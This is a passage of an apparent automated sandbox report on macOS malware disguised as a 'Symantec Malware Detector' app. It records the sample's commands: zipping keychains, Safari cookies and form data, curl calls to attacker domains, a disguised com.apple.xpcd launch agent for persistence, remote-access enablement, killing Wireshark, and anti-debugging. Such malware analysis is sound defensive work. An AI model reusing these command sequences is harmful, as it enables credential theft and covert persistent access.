Source: /usr/bin/perl5.18 (PID: 581)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_geod' uid
Source: /usr/bin/perl5.18 (PID: 582)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_iconservices' uid
Source: /usr/bin/perl5.18 (PID: 583)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_installassistant' uid
Source: /usr/bin/perl5.18 (PID: 584)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_installer' uid
Source: /usr/bin/perl5.18 (PID: 585)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_jabber' uid
Source: /usr/bin/perl5.18 (PID: 586)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_kadmin_admin' uid
Source: /usr/bin/perl5.18 (PID: 587)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_kadmin_changepw' uid
Source: /usr/bin/perl5.18 (PID: 588)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_anonymous' uid
Source: /usr/bin/perl5.18 (PID: 589)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_changepw' uid
Source: /usr/bin/perl5.18 (PID: 590)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_kadmin' uid
Source: /usr/bin/perl5.18 (PID: 591)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_kerberos' uid
Source: /usr/bin/perl5.18 (PID: 592)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_krbtgt' uid
Source: /usr/bin/perl5.18 (PID: 593)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krbfast' uid
Executes the "chmod" command used to modify permissionsShow sources
Source: /usr/bin/sudo (PID: 540)Chmod executable: /bin/chmod -> chmod -R 777 /Library/.cachedir /Library/.random
Source: /usr/bin/sudo (PID: 548)Chmod executable: /bin/chmod -> chmod 644 /Library/LaunchAgents/com.apple.xpcd.plist
Executes the "curl" command used to transfer data via the network (usually using HTTP/S)Show sources
Source: /bin/sh (PID: 513)Curl executable: /usr/bin/curl -> curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Source: /bin/sh (PID: 516)Curl executable: /usr/bin/curl -> curl -s --connect-timeout 10 -o /tmp/au https://symantecheurengine.com/rsa
Executes the "dscl" in order to retrieve a list of existing users and/or other user informationShow sources
Source: /bin/sh (PID: 553)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -list /Local/Target/Users
Source: /bin/sh (PID: 554)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_amavisd uid
Source: /bin/sh (PID: 555)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appleevents uid
Source: /bin/sh (PID: 556)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appowner uid
Source: /bin/sh (PID: 557)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appserver uid
Source: /bin/sh (PID: 558)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ard uid
Source: /bin/sh (PID: 559)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_assetcache uid
Source: /bin/sh (PID: 560)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_astris uid
Source: /bin/sh (PID: 561)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_atsserver uid
Source: /bin/sh (PID: 562)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_avbdeviced uid
Source: /bin/sh (PID: 563)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_calendar uid
Source: /bin/sh (PID: 564)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ces uid
Source: /bin/sh (PID: 565)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_clamav uid
Source: /bin/sh (PID: 566)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coreaudiod uid
Source: /bin/sh (PID: 567)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coremediaiod uid
Source: /bin/sh (PID: 568)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvmsroot uid
Source: /bin/sh (PID: 569)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvs uid
Source: /bin/sh (PID: 570)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cyrus uid
Source: /bin/sh (PID: 571)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devdocs uid
Source: /bin/sh (PID: 572)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devicemgr uid
Source: /bin/sh (PID: 573)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_displaypolicyd uid
Source: /bin/sh (PID: 574)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_distnote uid
Source: /bin/sh (PID: 575)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovecot uid
Source: /bin/sh (PID: 576)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovenull uid
Source: /bin/sh (PID: 577)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dpaudio uid
Source: /bin/sh (PID: 578)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_eppc uid
Source: /bin/sh (PID: 579)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ftp uid
Source: /bin/sh (PID: 580)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_gamecontrollerd uid
Source: /bin/sh (PID: 581)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_geod uid
Source: /bin/sh (PID: 582)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_iconservices uid
Source: /bin/sh (PID: 583)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installassistant uid
Source: /bin/sh (PID: 584)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installer uid
Source: /bin/sh (PID: 585)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_jabber uid
Source: /bin/sh (PID: 586)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_admin uid
Source: /bin/sh (PID: 587)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_changepw uid
Source: /bin/sh (PID: 588)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_anonymous uid
Source: /bin/sh (PID: 589)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_changepw uid
Source: /bin/sh (PID: 590)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kadmin uid
Source: /bin/sh (PID: 591)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kerberos uid
Source: /bin/sh (PID: 592)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_krbtgt uid
Source: /bin/sh (PID: 593)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krbfast uid
Executes the "mkdir" command used to create foldersShow sources
Source: /bin/sh (PID: 481)Mkdir executable: /bin/mkdir -> mkdir /tmp/.dio3we
Source: /usr/bin/sudo (PID: 538)Mkdir executable: /bin/mkdir -> mkdir -p /Library/.cachedir /Library/.random
Executes the "ping" command used for connectivity testing via ICMPShow sources
Source: /bin/sh (PID: 518)Ping executable: /sbin/ping -> ping -c 1 symantecheurengine.com
Source: /bin/sh (PID: 520)Ping executable: /sbin/ping -> ping -c 1 symheureng.com
Source: /bin/sh (PID: 522)Ping executable: /sbin/ping -> ping -c 1 symeher.co
Source: /bin/sh (PID: 524)Ping executable: /sbin/ping -> ping -c 1 kio2349329490jfdkf394.com
Source: /bin/sh (PID: 526)Ping executable: /sbin/ping -> ping -c 1 klsadkla93242lokiloki.com
Source: /bin/sh (PID: 528)Ping executable: /sbin/ping -> ping -c 1 abrahamlincolnisaliveandrunssymantec.com
Executes the "route" command used read or manipulate the routing tablesShow sources
Source: /bin/sh (PID: 479)Route executable: /sbin/route -> route -n get default
Opens applications that may be created onesShow sources
Source: /bin/sh (PID: 504)Application opened: open /tmp/xpc.app
Reads launchservices plist filesShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices.plist
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices.plist
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Reads user launchservices plist file containing default apps for corresponding filetypesShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Preferences launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Preferences launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Writes 64-bit Mach-O files to diskShow sources
Source: /usr/bin/unzip (PID: 502)File written: /private/tmp/xpc.app/Contents/MacOS/xpc
Source: /bin/cp (PID: 541)File written: /Library/.random/xpcd.app/Contents/MacOS/xpc
Writes Mach-O files to the tmp directoryShow sources
Source: /usr/bin/unzip (PID: 502)64-bit Mach-O written to tmp path: /private/tmp/xpc.app/Contents/MacOS/xpc
Writes Python files to diskShow sources
Source: /usr/bin/unzip (PID: 502)Python file created: /private/tmp/xpc.app/Contents/Resources/cb.py
Source: /usr/bin/unzip (PID: 502)Python file created: /private/tmp/xpc.app/Contents/Resources/ch.py
Source: /usr/bin/unzip (PID: 502)Python file created: /private/tmp/xpc.app/Contents/Resources/pbkdf2.py
Source: /usr/bin/unzip (PID: 502)Python file created: /private/tmp/xpc.app/Contents/Resources/pyDes.py
Source: /usr/bin/unzip (PID: 502)Python file created: /private/tmp/xpc.app/Contents/Resources/Schema.py
Source: /bin/cp (PID: 541)Python file created: /Library/.random/xpcd.app/Contents/Resources/cb.py
Source: /bin/cp (PID: 541)Python file created: /Library/.random/xpcd.app/Contents/Resources/ch.py
Source: /bin/cp (PID: 541)Python file created: /Library/.random/xpcd.app/Contents/Resources/pbkdf2.py
Source: /bin/cp (PID: 541)Python file created: /Library/.random/xpcd.app/Contents/Resources/pyDes.py
Source: /bin/cp (PID: 541)Python file created: /Library/.random/xpcd.app/Contents/Resources/Schema.py
Writes ZIP files to diskShow sources
Source: /usr/bin/zip (PID: 485)ZIP file created: /private/tmp/.dio3we/ziRJb6aY
Source: /usr/bin/zip (PID: 487)ZIP file created: /private/tmp/.dio3we/ziPHlHPH
Writes icon files to diskShow sources
Source: /usr/bin/unzip (PID: 502)File written: /private/tmp/xpc.app/Contents/Resources/Finder.icns
Source: /bin/cp (PID: 541)File written: /Library/.random/xpcd.app/Contents/Resources/Finder.icns
Executes the "rm" command used to delete files or directoriesShow sources
Source: /bin/sh (PID: 483)Rm executable: /bin/rm -> rm -rf /Users/vreni/Library/Safari/History.db.dump
Source: /usr/bin/xargs (PID: 492)Rm executable: /bin/rm -> rm -- /tmp/.dio3we/KEYCHAINS.zip /tmp/.dio3we/SAFARI.zip
Source: /bin/sh (PID: 531)Rm executable: /bin/rm -> rm -rf /tmp/.sklerfde
Source: /bin/sh (PID: 535)Rm executable: /bin/rm -> rm -rf grace_period
Executes the "sudo" command used to execute a command as another userShow sources
Source: /bin/sh (PID: 495)Sudo executable: /usr/bin/sudo -> sudo -k
Source: /bin/sh (PID: 498)Sudo executable: /usr/bin/sudo -> sudo -S echo success
Source: /bin/sh (PID: 537)Sudo executable: /usr/bin/sudo -> sudo -S mkdir -p /Library/.cachedir /Library/.random
Source: /bin/sh (PID: 539)Sudo executable: /usr/bin/sudo -> sudo chmod -R 777 /Library/.cachedir /Library/.random
Source: /bin/sh (PID: 543)Sudo executable: /usr/bin/sudo -> sudo sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>xpcd</string><key>CFBundleIdentifier</key><string>com.apple.xpcd</string><key>CFBundleInfoDictionaryVersion</key><string>2.0</string><key>CFBundleName</key><string>xpcd</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>2.0</string><key>CFBundleSignature</key><string>????</string><key>CFBundleSupportedPlatforms</key><array><string>MacOSX</string></array><key>CFBundleVersion</key><string>17</string><key>DTSDKName</key><string>macosx10.12internal</string><key>LSMinimumSystemVersion</key><string>10.7</string><key>LSUIElement</key><true/><key>NSHumanReadableCopyright</key><string>Copyright 2017 wickedinfinity. All rights reserved.</string><key>NSMainNibFile</key><string>
Source: /bin/sh (PID: 545)Sudo executable: /usr/bin/sudo -> sudo sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>KeepAlive</key><true/><key>Label</key><string>com.apple.xpcd</string><key>ProgramArguments</key><array><string>/Library/.random/xpcd.app/Contents/MacOS/xpcd</string></array><key>RunAtLoad</key><true/></dict></plist>' > /Library/LaunchAgents/com.apple.xpcd.plist
Source: /bin/sh (PID: 547)Sudo executable: /usr/bin/sudo -> sudo chmod 644 /Library/LaunchAgents/com.apple.xpcd.plist
Source: /bin/sh (PID: 550)Sudo executable: /usr/bin/sudo -> sudo -S /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers
Many shell processes execute programs via execve syscall (may be indicative for malicious behaviour)Show sources
Source: /bin/sh (PID: 479)Shell process: route -n get default
Source: /bin/sh (PID: 480)Shell process: awk /gateway/ { print $2 }
Source: /bin/sh (PID: 481)Shell process: mkdir /tmp/.dio3we
Source: /bin/sh (PID: 482)Shell process: cp /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/History.db.dump
Source: /bin/sh (PID: 483)Shell process: rm -rf /Users/vreni/Library/Safari/History.db.dump
Source: /bin/sh (PID: 485)Shell process: zip -qr /tmp/.dio3we/SAFARI.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/Bookmarks.plist /Users/vreni/Library/Safari/Form Values
Source: /bin/sh (PID: 487)Shell process: zip -qr /tmp/.dio3we/KEYCHAINS.zip /Users/vreni/Library/Keychains /Library/Keychains
Source: /bin/sh (PID: 490)Shell process: find /tmp/.dio3we -type f -not -name backup_(null).zip -print0
Source: /bin/sh (PID: 491)Shell process: xargs -0 rm --
Source: /bin/sh (PID: 493)Shell process: screencapture -x /tmp/.dio3we/.prelim.png
Source: /bin/sh (PID: 494)Shell process: csrutil status
Source: /bin/sh (PID: 495)Shell process: sudo -k
Source: /bin/sh (PID: 498)Shell process: sudo -S echo success
Source: /bin/sh (PID: 502)Shell process: unzip -d /tmp /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/Resources/sym03_2901.dat
Source: /bin/sh (PID: 503)Shell process: xattr -c /tmp/xpc.app
Source: /bin/sh (PID: 504)Shell process: open /tmp/xpc.app
Source: /bin/sh (PID: 507)Shell process: openssl rsautl -verify -in /tmp/xpc.app/Contents/Resources/.checksum -pubin -inkey /tmp/public.pem
Source: /bin/sh (PID: 510)Shell process: nc -G 20 -z 8.8.8.8 53
Source: /bin/sh (PID: 513)Shell process: curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Source: /bin/sh (PID: 516)Shell process: curl -s --connect-timeout 10 -o /tmp/au https://symantecheurengine.com/rsa
Source: /bin/sh (PID: 518)Shell process: ping -c 1 symantecheurengine.com
Source: /bin/sh (PID: 520)Shell process: ping -c 1 symheureng.com
Source: /bin/sh (PID: 522)Shell process: ping -c 1 symeher.co
Source: /bin/sh (PID: 524)Shell process: ping -c 1 kio2349329490jfdkf394.com
Source: /bin/sh (PID: 526)Shell process: ping -c 1 klsadkla93242lokiloki.com
Source: /bin/sh (PID: 528)Shell process: ping -c 1 abrahamlincolnisaliveandrunssymantec.com
Source: /bin/sh (PID: 530)Shell process: cat /tmp/.sklerfde
Source: /bin/sh (PID: 531)Shell process: rm -rf /tmp/.sklerfde
Source: /bin/sh (PID: 533)Shell process: killall Console
Source: /bin/sh (PID: 534)Shell process: killall Wireshark
Source: /bin/sh (PID: 535)Shell process: rm -rf grace_period
Source: /bin/sh (PID: 537)Shell process: sudo -S mkdir -p /Library/.cachedir /Library/.random
Source: /bin/sh (PID: 539)Shell process: sudo chmod -R 777 /Library/.cachedir /Library/.random
Source: /bin/sh (PID: 541)Shell process: cp -R /tmp/xpc.app /Library/.random/xpcd.app
Source: /bin/sh (PID: 542)Shell process: mv /Library/.random/xpcd.app/Contents/MacOS/xpc /Library/.random/xpcd.app/Contents/MacOS/xpcd
Source: /bin/sh (PID: 543)Shell process: sudo sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>xpcd</string><key>CFBundleIdentifier</key><string>com.apple.xpcd</string><key>CFBundleInfoDictionaryVersion</key><string>2.0</string><key>CFBundleName</key><string>xpcd</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>2.0</string><key>CFBundleSignature</key><string>????</string><key>CFBundleSupportedPlatforms</key><array><string>MacOSX</string></array><key>CFBundleVersion</key><string>17</string><key>DTSDKName</key><string>macosx10.12internal</string><key>LSMinimumSystemVersion</key><string>10.7</string><key>LSUIElement</key><true/><key>NSHumanReadableCopyright</key><string>Copyright 2017 wickedinfinity. All rights reserved.</string><key>NSMainNibFile</key><string>MainMenu</string>
Source: /bin/sh (PID: 545)Shell process: sudo sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>KeepAlive</key><true/><key>Label</key><string>com.apple.xpcd</string><key>ProgramArguments</key><array><string>/Library/.random/xpcd.app/Contents/MacOS/xpcd</string></array><key>RunAtLoad</key><true/></dict></plist>' > /Library/LaunchAgents/com.apple.xpcd.plist
Source: /bin/sh (PID: 547)Shell process: sudo chmod 644 /Library/LaunchAgents/com.apple.xpcd.plist
Source: /bin/sh (PID: 550)Shell process: sudo -S /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers
Source: /bin/sh (PID: 553)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -list /Local/Target/Users
Source: /bin/sh (PID: 554)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_amavisd uid
Source: /bin/sh (PID: 555)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appleevents uid
Source: /bin/sh (PID: 556)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appowner uid
Source: /bin/sh (PID: 557)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appserver uid
Source: /bin/sh (PID: 558)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ard uid
Source: /bin/sh (PID: 559)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_assetcache uid
Source: /bin/sh (PID: 560)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_astris uid
Source: /bin/sh (PID: 561)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_atsserver uid
Source: /bin/sh (PID: 562)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_avbdeviced uid
Source: /bin/sh (PID: 563)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_calendar uid
Source: /bin/sh (PID: 564)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ces uid
Source: /bin/sh (PID: 565)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_clamav uid
Source: /bin/sh (PID: 566)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coreaudiod uid
Source: /bin/sh (PID: 567)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coremediaiod uid
Source: /bin/sh (PID: 568)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvmsroot uid
Source: /bin/sh (PID: 569)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvs uid
Source: /bin/sh (PID: 570)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cyrus uid
Source: /bin/sh (PID: 571)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devdocs uid
Source: /bin/sh (PID: 572)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devicemgr uid
Source: /bin/sh (PID: 573)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_displaypolicyd uid
Source: /bin/sh (PID: 574)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_distnote uid
Source: /bin/sh (PID: 575)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovecot uid
Source: /bin/sh (PID: 576)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovenull uid
Source: /bin/sh (PID: 577)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dpaudio uid
Source: /bin/sh (PID: 578)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_eppc uid
Source: /bin/sh (PID: 579)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ftp uid
Source: /bin/sh (PID: 580)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_gamecontrollerd uid
Source: /bin/sh (PID: 581)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_geod uid
Source: /bin/sh (PID: 582)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_iconservices uid
Source: /bin/sh (PID: 583)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installassistant uid
Source: /bin/sh (PID: 584)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installer uid
Source: /bin/sh (PID: 585)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_jabber uid
Source: /bin/sh (PID: 586)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_admin uid
Source: /bin/sh (PID: 587)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_changepw uid
Source: /bin/sh (PID: 588)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_anonymous uid
Source: /bin/sh (PID: 589)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_changepw uid
Source: /bin/sh (PID: 590)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kadmin uid
Source: /bin/sh (PID: 591)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kerberos uid
Source: /bin/sh (PID: 592)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_krbtgt uid
Source: /bin/sh (PID: 593)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krbfast uid
Reads local browser cookiesShow sources
Source: /usr/bin/zip (PID: 485)Binary cookie file read: /Users/vreni/Library/Cookies/Cookies.binarycookies
Source: /usr/bin/zip (PID: 485)Binary cookie file read: /Users/vreni/Library/Cookies/Cookies.binarycookies
Terminates several processes with shell command 'killall'Show sources
Source: /bin/sh (PID: 533)Killall command executed: killall Console
Source: /bin/sh (PID: 534)Killall command executed: killall Wireshark

Boot Survival:

barindex
Creates memory-persistent launch servicesShow sources
Source: /bin/sh (PID: 546)Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Library/LaunchAgents/com.apple.xpcd.plist
Creates user-wide 'launchd' managed services aka launch agentsShow sources
Source: /bin/sh (PID: 546)Launch agent created file created: /Library/LaunchAgents/com.apple.xpcd.plist

Hooking and other Techniques for Hiding and Protection:

barindex
Creates 'launchd' managed services aka launch agents with bundle ID names to possibly disguise malicious intentionsShow sources
Source: /bin/sh (PID: 546)Launch agent created file created: /Library/LaunchAgents/com.apple.xpcd.plist
Denies being traced/debugged (via ptrace PT_DENY_ATTACH)Show sources
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)PTRACE system call (PT_DENY_ATTACH): PID 505 denies future traces
Explicitly terminates console (used for log message viewing) processesShow sources
Source: /bin/sh (PID: 533)Kills 'Console' processes: killall Console
Explicitly terminates network capturing processesShow sources
Source: /bin/sh (PID: 534)Kills 'Wireshark' processes: killall Wireshark

HIPS / PFW / Operating System Protection Evasion:

barindex
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)Show sources
